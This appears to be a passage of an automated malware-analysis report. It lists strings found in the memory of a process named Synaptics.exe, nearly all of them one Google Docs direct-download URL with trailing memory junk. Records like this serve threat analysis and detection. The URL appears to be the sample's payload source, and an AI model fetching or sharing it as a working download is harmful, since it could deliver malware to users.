Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5e
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000070A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000070EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download65
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.000000000719D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download70
Source: Synaptics.exe, 00000003.00000002.1744350612.000000000719D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download72px
Source: Synaptics.exe, 00000003.00000002.1738664470.0000000005333000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download73#
Source: Synaptics.exe, 00000003.00000002.1771384181.000000000E192000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.000000000719D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000070EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download82j;
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.000000000719D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download96h;
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9F
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9a
Source: Synaptics.exe, 00000003.00000002.1738664470.0000000005337000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:e
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000070A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000070EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;
Source: Synaptics.exe, 00000003.00000002.1738664470.0000000005337000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;-
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;5i8A
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000070A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=7t:
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=G
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=d
Source: Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=d5
Source: Synaptics.exe, 00000003.00000002.1735541837.000000000054D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=dl:
Source: Synaptics.exe, 00000003.00000002.1744350612.000000000719D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download??t:
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?c
Source: Synaptics.exe, 00000003.00000002.1769316443.000000000E048000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000070A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000070EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA6
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAF
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAd
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000070A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.000000000719D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB
Source: Synaptics.exe, 00000003.00000002.1738664470.0000000005337000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBJZFR
Source: Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBx
Source: Synaptics.exe, 00000003.00000002.1744350612.000000000719D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC
Source: Synaptics.exe, 00000003.00000002.1738664470.0000000005337000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCanc
Source: Synaptics.exe, 00000003.00000002.1769316443.000000000E048000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1771384181.000000000E192000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000070A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1738664470.0000000005337000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000070EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD3N:
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDg
Source: Synaptics.exe, 00000003.00000002.1735541837.000000000054D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDg5;
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDr
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000070A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.000000000719D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE7L:
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEG
Source: Synaptics.exe, 00000003.00000002.1769316443.000000000E048000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000070A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadFb
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadFo
Source: Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000070EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG2M;-
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG?L:
Source: Synaptics.exe, 00000003.00000002.1738664470.0000000005337000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadGWXUH
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadGf
Source: Synaptics.exe, 00000003.00000002.1771384181.000000000E192000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000070A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.000000000719D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadH
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadHc
Source: Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000070EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIE
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1735541837.000000000054D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIg
Source: Synaptics.exe, 00000003.00000002.1738664470.00000000052A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIv
Source: Synaptics.exe, 00000003.00000002.1736544630.0000000002180000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000070A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.000000000719D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1738664470.00000000052A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000070A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadK
Source: Synaptics.exe, 00000003.00000002.1771384181.000000000E192000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL2F;.
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000070A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadLo
Source: Synaptics.exe, 00000003.00000002.1791600839.000000001363E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1768011840.000000000D13E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1767752911.000000000CD7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1791507797.00000000134FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1765375947.000000000ACFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1774526491.000000000EBBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1768993202.000000000DC7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1766390294.000000000B97E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1760364279.000000000863E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1761500664.0000000008B3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1759126673.0000000007AFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1775262770.000000000F33E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1795045594.00000000157FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1740235722.000000000576E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1773977704.000000000E6BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1796396338.00000000165BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1776853033.000000001023E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1787497253.000000001163E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1789396681.00000000129BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1793821321.0000000014B7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1788442607.0000000011E7E000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadM
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadM)D8&
Source: Synaptics.exe, 00000003.00000002.1740035016.00000000054EE000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadM22
Source: Synaptics.exe, 00000003.00000002.1738116105.0000000004C4E000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadM66
Source: Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadN
Source: Synaptics.exe, 00000003.00000002.1738664470.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000070A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000070EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadO
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadO1D8&
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadO5E8E
Source: Synaptics.exe, 00000003.00000002.1771384181.000000000E192000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000070A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.000000000719D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadP
Source: Synaptics.exe, 00000003.00000002.1738664470.0000000005337000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPI0
Source: Synaptics.exe, 00000003.00000002.1738664470.0000000005337000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPPWAP
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000070A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.000000000719D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000070EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ)P8%
Source: Synaptics.exe, 00000003.00000002.1769316443.000000000E048000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000070EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadR
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadR2P;
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadRf
Source: Synaptics.exe, 00000003.00000002.1738664470.00000000052A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadRi
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000070A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.000000000719D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS1P8%
Source: Synaptics.exe, 00000003.00000002.1769316443.000000000E048000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1771384181.000000000E192000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000070A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT
Source: Synaptics.exe, 00000003.00000002.1738664470.00000000052A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadThe
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000070EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU-
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU5_8C
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU6
Source: Synaptics.exe, 00000003.00000002.1738664470.0000000005337000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUBZFf
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUF
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000070A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.000000000719D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000070A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW
Source: Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW%
Source: Synaptics.exe, 00000003.00000002.1735541837.000000000054D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW&
Source: Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWM
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1735541837.000000000054D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWd
Source: Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWy
